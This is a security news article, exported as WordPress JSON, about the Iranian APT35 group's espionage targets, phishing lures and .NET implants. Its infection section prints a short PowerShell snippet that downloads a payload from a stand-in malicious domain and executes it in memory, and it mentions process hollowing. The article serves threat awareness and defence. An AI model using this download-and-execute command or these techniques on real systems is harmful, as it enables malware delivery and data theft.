{"id":7539,"date":"2025-10-09T10:03:49","date_gmt":"2025-10-09T10:03:49","guid":{"rendered":"https:\/\/serisec.com\/index.php\/2025\/10\/09\/irgc-linked-apt35-structure-tools-and-espionage-operations-disclosed\/"},"modified":"2025-10-09T10:03:49","modified_gmt":"2025-10-09T10:03:49","slug":"irgc-linked-apt35-structure-tools-and-espionage-operations-disclosed","status":"publish","type":"post","link":"https:\/\/serisec.com\/index.php\/2025\/10\/09\/irgc-linked-apt35-structure-tools-and-espionage-operations-disclosed\/","title":{"rendered":"IRGC-Linked APT35 Structure, Tools, and Espionage Operations Disclosed"},"content":{"rendered":"<p>    IRGC-Linked APT35 Structure, Tools, and Espionage Operations Disclosed<br \/>\n \t<BR><br \/>\n<BR><\/BR><br \/>\n    <!-- no image --><br \/>\n \t<BR><br \/>\n<BR><\/BR><\/p>\n<div>\n<p>Since emerging in the mid-2010s as a persistent threat actor, the IRGC-linked APT35 collective has continually adapted its tactics to target government entities, energy firms, and diplomatic missions across the Middle East and beyond.<\/p>\n<p>Initially focused on credential harvesting via targeted <a href=\"https:\/\/cybersecuritynews.com\/evolving-phishing-campaigns\/\" target=\"_blank\" rel=\"noreferrer noopener\">phishing campaigns<\/a>, the group has evolved a modular toolkit capable of deep network infiltration and long-term espionage.<\/p>\n<p>Its operations begin with carefully crafted spear-phishing messages that exploit legacy Office macro vulnerabilities, setting the stage for stealthy deployment of backdoors.<\/p>\n<p>Cloudsek analysts noted that APT35\u2019s toolset includes both custom and publicly available components, allowing researchers to trace distinct code fingerprints even as the adversary pivots between payloads.<\/p>\n<p>After the second paragraph, Cloudsek researchers <a href=\"https:\/\/www.cloudsek.com\/blog\/an-insider-look-at-the-irgc-linked-apt35-operations\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">identified<\/a> a correlation between the group\u2019s use of .NET-based implants and a pronounced shift toward in-memory execution techniques, reducing disk artifacts and complicating forensic analysis.<\/p>\n<p>This discovery has driven the development of tailored detection rules for <a href=\"https:\/\/cybersecuritynews.com\/network-intrusion-detection\/\" target=\"_blank\" rel=\"noreferrer noopener\">network defenders<\/a>.<\/p>\n<p>The campaign\u2019s impact has been significant: compromised networks have suffered data exfiltration of diplomatic communications, intellectual property theft, and strategic reconnaissance tailored to state-level objectives.<\/p>\n<p>APT35\u2019s operational security measures\u2014including randomized C2 beaconing intervals and encrypted channels over HTTP\/HTTPS\u2014have consistently evaded traditional signature-based defenses. Victims often remain unaware of compromise for months, allowing deep data collection and lateral propagation.<\/p>\n<p>The group\u2019s espionage operations extend beyond technical tradecraft. APT35 operators conduct extensive open-source intelligence (<a href=\"https:\/\/cybersecuritynews.com\/darkgpt-ai-osint-tool\/\" target=\"_blank\" rel=\"noreferrer noopener\">OSINT<\/a>) gathering to craft highly convincing lures, leveraging geopolitical events and professional contacts in targeted organizations.<\/p>\n<p>This human-centric approach, combined with advanced malware, underscores the adversary\u2019s adaptability and resource investment.<\/p>\n<h2 class=\"wp-block-heading\" id=\"h-infection-mechanism-deep-dive\"><strong>Infection Mechanism Deep Dive<\/strong><\/h2>\n<p>APT35\u2019s primary infection vector leverages weaponized Word documents containing obfuscated VBA macros designed to load a staged downloader into memory.<\/p>\n<p>Upon document opening, the macro executes a <a href=\"https:\/\/cybersecuritynews.com\/hackers-actively-exploiting-powershell\/\" target=\"_blank\" rel=\"noreferrer noopener\">PowerShell<\/a> command that masquerades as a legitimate Windows Update process:-<\/p>\n<pre class=\"wp-block-code\"><code>$u = \"http:\/\/malicious[.]domain\/payload.bin\"\n$r = Invoke-WebRequest -Uri $u -UseBasicParsing\n$e = [System.Text.Encoding]::UTF8.GetString($r.Content)\nInvoke-Expression $e<\/code><\/pre>\n<p>This downloader decrypts the next-stage DLL using an AES key embedded in the VBA code. The decrypted payload, typically a .NET-compiled backdoor known as <strong>PhosphorusLoader<\/strong>, registers as a COM object for persistence.<\/p>\n<p>It employs process hollowing to inject into <code>svchost.exe<\/code>, intermittently beaconing to a hidden C2 domain. Figure 1 illustrates this injection workflow, with the AES key stored in an encrypted resource section for evasion.<\/p>\n<p class=\"has-text-align-center has-background\" style=\"background:linear-gradient(180deg,rgb(238,238,238) 92%,rgb(169,184,195) 100%)\"><strong>Follow us on\u00a0<a href=\"https:\/\/news.google.com\/publications\/CAAqMggKIixDQklTR3dnTWFoY0tGV041WW1WeWMyVmpkWEpwZEhsdVpYZHpMbU52YlNnQVAB?hl=en-IN&amp;gl=IN&amp;ceid=IN:en\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">Google News<\/a>,\u00a0<a href=\"https:\/\/www.linkedin.com\/company\/cybersecurity-news\/\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">LinkedIn<\/a>,\u00a0and\u00a0<a href=\"https:\/\/x.com\/cyber_press_org\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">X<\/a>\u00a0to Get More Instant Updates<\/strong>,\u00a0<strong>Set CSN as a Preferred Source in\u00a0<a href=\"https:\/\/www.google.com\/preferences\/source?q=cybersecuritynews.com\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">Google<\/a>.<\/strong><\/p>\n<p>The post <a href=\"https:\/\/cybersecuritynews.com\/irgc-linked-apt35-structure-tools\/\">IRGC-Linked APT35 Structure, Tools, and Espionage Operations Disclosed<\/a> appeared first on <a href=\"https:\/\/cybersecuritynews.com\/\">Cyber Security News<\/a>.<\/p>\n<\/div>\n<p> \t<BR><br \/>\n <BR><\/BR><br \/>\n    Tushar Subhra Dutta<br \/>\n \t<BR><br \/>\n<BR><\/BR><br \/>\n<a href=\"https:\/\/cybersecuritynews.com\/irgc-linked-apt35-structure-tools\/\">Go to cyber-security-news<\/a><br \/>\n \t<BR><br \/>\n <BR><\/BR><\/p>\n","protected":false},"excerpt":{"rendered":"<p>IRGC-Linked APT35 Structure, Tools, and Espionage Operations Disclosed Since emerging in the mid-2010s as a persistent threat actor, the IRGC-linked APT35 collective has continually adapted its tactics to target government entities, energy firms, and diplomatic missions across the Middle East and beyond. Initially focused on credential harvesting via targeted phishing campaigns, the group has evolved [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[129,63,649],"tags":[130],"class_list":["post-7539","post","type-post","status-publish","format-standard","hentry","category-cyber-security","category-cyber-security-news","category-threats","tag-cyber-security-news"],"_links":{"self":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/7539"}],"collection":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/comments?post=7539"}],"version-history":[{"count":0,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/7539\/revisions"}],"wp:attachment":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/media?parent=7539"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/categories?post=7539"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/tags?post=7539"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}